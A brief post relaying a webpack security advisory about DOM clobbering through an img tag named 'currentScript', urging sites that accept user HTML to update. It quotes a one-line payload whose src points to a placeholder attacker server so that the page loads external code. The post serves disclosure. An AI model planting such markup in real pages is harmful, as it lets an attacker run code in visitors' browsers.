Webpack has a new security advisory: https://github.com/advisories/GHSA-4vvj-4cpr-p986
> The attacker only needs to insert an iimgtag with the name attribute set to currentScript.
>
> […]
>
> <img name="currentScript" src="https://attacker.controlled.server/"></img>
If you use webpack and your site allows users to enter any HTML at all, you might wanna look at updating.